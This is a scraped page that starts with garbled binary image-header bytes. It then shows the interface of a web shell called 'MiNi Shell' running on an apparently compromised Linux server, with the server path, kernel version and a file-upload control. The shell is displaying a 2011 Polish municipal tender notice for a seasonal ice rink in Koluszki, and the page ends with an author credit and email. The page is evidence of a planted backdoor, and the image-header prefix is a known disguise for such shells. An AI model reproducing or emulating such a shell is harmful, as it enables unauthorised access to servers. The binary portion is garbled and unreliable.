JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/274665-N-2011.html

<p class="kh_header"><b>Koluszki: Dostawa  wraz z montażem  sztucznego składanego  lodowiska  sezonowego realizowanego w ramach pilotażowego Biały Orlik dofinansowanego  przez  Ministerstwo Sportu i Turystyki.</b><br>
<b>Numer ogłoszenia: 274665 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  wraz z montażem  sztucznego składanego  lodowiska  sezonowego realizowanego w ramach pilotażowego Biały Orlik dofinansowanego  przez  Ministerstwo Sportu i Turystyki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)   Przedmiotem  zamówienia   jest  dostawa  wraz  z  montażem  sztucznego  lodowiska  o  wymiarach  minimalnych : 17, 50 m x 30, 00 m w skład, którego  wchodzi: 
1.	dostawa i montaż agregatu chłodniczego wraz z jego podłączeniem do wykonanej  skrzynki  złączowo - pomiarowej  umiejscowionej   przy  
ul.  Żwirki  w Koluszkach. 
2.	dostawa i  montaż  orurowania  chłodniczego,
3.	dostawa i  montaż  band  lodowiska,
4.	dostawa i  wpompowanie  do  układu  chłodniczego  niezbędnej  ilości  glikolu,
5.	dostawa  pompy i  paleto pojemników w ilości niezbędnej do magazynowania po  sezonie,
6.	dostawa i  ułożenie chodników  gumowych  w ciągach  komunikacyjnych,
7.	uruchomienie  i   budowa  lodu,
8.	szkolenie  pracowników, opracowanie Dokumentacji Techniczno -Ruchowej 
        w tym  instrukcji  montażu i demontażu  lodowiska.
9.	demontaż  lodowiska  wraz  z  armaturą  po  sezonie zimowym  i  złożenie 
        elementów  w  magazynie  znajdującym  się  na terenie  O. S .i R. 
        w  Koluszkach.
10.	bezpłatny serwis i naprawy  elementów  lodowiska  i  dostarczonych  urządzeń 
        w okresie  udzielonej  36  miesięcznej  gwarancji.
  
2) Zakres  robót  dla całego zamierzenia:
a)	posadowienie  agregatu,
b)	wykonanie  instalacji  lodowiska :   17,50 m  x   30,00  m,
c)	podłączenie hydrauliczne agregatu  z  instalacją  lodowiska,
d)	montaż  band 
3)   Opis rozwiązań  technicznych
-	płyta  sztucznie  mrożona,  demontowalna  o  wymiarach:  17,5 m x  30,00 m,
-	sezon  pracy  lodowiska - okres zimowy przy temperaturze zewnętrznej powietrza do 10 0 C , prędkości wiatru około 2 m na s,  promieniowaniu słonecznym  rozproszonym.
-	liczba użytkowników korzystających jednocześnie z obiektu średnio - około 
        80 osób. 
-	liczba godzin pracy lodowiska - 10 -14 godzin na dobę.
-	kompaktowy  agregat chłodniczy o parametrach pracy  -110C/ - 80C.
4)  Projektowane zagospodarowanie  terenu.
-	lodowisko  17,5 m x  30,0 m  -   525  m2
-	lokalizacja  została dopasowana do  istniejącego  terenu,
-	bandy o wysokości  min.  1,10 m o  pełnym  wypełnieniu,
-	agregat  chłodniczy  usytuowany  na  terenie  kompleksu,
-	ścieżki  od  istniejących  ciągów  komunikacyjnych  dostosowane do potrzeb    
        użytkowania  obiektu.
  -    powierzchnia  posadowienia  kompaktowego  agregatu  chłodniczego:  16 m2
5) Miejsce  dostawy i  montażu :  teren  Ośrodka  Sportu i  Rekreacji  w  Koluszkach  przy  ul.  Żwirki 11.  
Obiekt  będzie  zlokalizowany na  istniejącym  kompleksie boisk. Montaż sztucznego  lodowiska  będzie na terenie  płaskim, oświetlonym na boisku wielofunkcyjnym  z  nawierzchnią  poliuretanową.
Zadanie  realizowane  w ramach  pilotażowego  programu budowy  składanych lodowisk  sezonowych  Biały  Orlik.   
6)  Dostawa  z montażem  sztucznego lodowiska  powinna być  zrealizowana  zgodnie  z  dokumentacją  techniczną  i  podanymi  parametrami urządzeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.11-8, 42.94.34.00-2, 19.51.00.00-4, 24.32.23.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanych  oświadczeń  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  i  24  Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru,  jeżeli odrębne przepisy  wymagają  wpisu  do  rejestru  wystawionego  nie  wcześniej  niż  
6  miesięcy  przed upływem  terminu  składania  ofert.
Na  podstawie  załączonych  dokumentów  i  oświadczeń Zamawiający zweryfikuje, 
czy  Wykonawca spełnia, czy nie  spełnia warunki  udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna ten warunek  za  spełniony na  podstawie  podpisanego  oświadczenia  o  spełnieniu warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca   wykaże, że w okresie ostatnich trzech lat przed  upływem  terminu   składania   ofert  a  jeżeli  okres prowadzenia  działalności  jest  krótszy - w  tym okresie,  wykonywał   minimum  dwie  realizacje  polegające  na  dostawie z montażem 
i  rozruchem,  demontowalnego  sztucznego  lodowiska  o  powierzchni    nie  mniejszej  niż  400 m 2   słownie :  czterysta  metrów  kwadratowych  ( każda  realizacja). 
Należy   podać   rodzaj  robót,  wartość  oraz datę i  miejsce  wykonania  wraz 
z  załączeniem   dokumentów   potwierdzających,  że  dostawy  te zostały  wykonane  należycie.
Na podstawie załączonych dokumentów  i  oświadczeń  Zamawiający  zweryfikuje, 
czy  Wykonawca  spełnia, czy nie spełnia warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22  ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Na  podstawie załączonych dokumentów i  oświadczeń  Zamawiający  zweryfikuje, 
czy  Wykonawca  spełnia, czy nie spełnia warunki udziału  w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna   ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału  w  postępowaniu,  o  których mowa  
w  art.  22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Na podstawie załączonych  dokumentów  i  oświadczeń  Zamawiający  zweryfikuje, 
czy  Wykonawca  spełnia, czy nie spełnia warunki  udziału  w  postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału  w  postępowaniu  o  których mowa  
w  art.  22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych. 
Na  podstawie załączonych dokumentów i  oświadczeń  Zamawiający zweryfikuje, 
czy  Wykonawca  spełnia, czy nie spełnia warunki  udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Wypełniony   formularz  oferty ( załącznik  nr 1 do Specyfikacji Istotnych  Warunków  Zamówienia ),
2) Wypełniony  formularz  cen  poszczególnych  elementów   (załącznik nr 1 A do Specyfikacji  Istotnych  Warunków  Zamówienia ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści  oferty na podstawie  której  dokonano  wyboru  wykonawcy w następujących przypadkach :
a)  w  uzasadnionych  przypadkach,  lub  innych  okolicznościach  niezależnych 
od  Zamawiającego  lub  Wykonawcy,  kiedy  konieczna  będzie  zmiana  terminu realizacji zamówienia,  Zamawiający  na  pisemny  wniosek  Wykonawcy  może  przedłużyć   termin  realizacji   zamówienia,
b)  w  innych  uzasadnionych  przypadkach, gdy  zajdzie  konieczność wprowadzenia  koniecznych  zmian  wynikających  z okoliczności, których nie można  było przewidzieć w chwili  zawarcia  umowy,
c) w  przypadku,  gdy  zmiany  postanowień  zawartej  umowy będą  korzystne dla Zamawiającego,  a   zmiany   te  wynikły  w  trakcie  realizacji  zamówienia, 
d)  w  przypadku,  gdy  zajdzie  uzasadniona  konieczność  ograniczenia,  
lub rezygnacji  z  części  umownego  zakresu robót,  
Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia umownego  poprzez  korektę  wartości  ryczałtowej  przedmiotu  umowy  po  cenach i  stawkach  wynikających  z  kosztorysu  ofertowego  Wykonawcy,
e)  w  przypadku  ustawowej  zmiany  stawki  podatku  od  towarów i  usług  ( VAT ) cena  netto  pozostanie  bez  zmian,  a  kwota podatku VAT i wartość  brutto zostanie  odpowiednio skorygowana  zgodnie z aktualnie obowiązującymi przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski  w  Koluszkach przy ul. 11- go  Listopada 65 pok nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 09:30, miejsce: kancelaria Urzędu  Miejskiego  w  Koluszkach  przy  ul. 11- go Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie  realizowane  w ramach  pilotażowego   programu   budowy  składanych lodowisk  sezonowych  Biały  Orlik   dofinansowanego   przez  Ministerstwo  Sportu  
i  Turystyki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com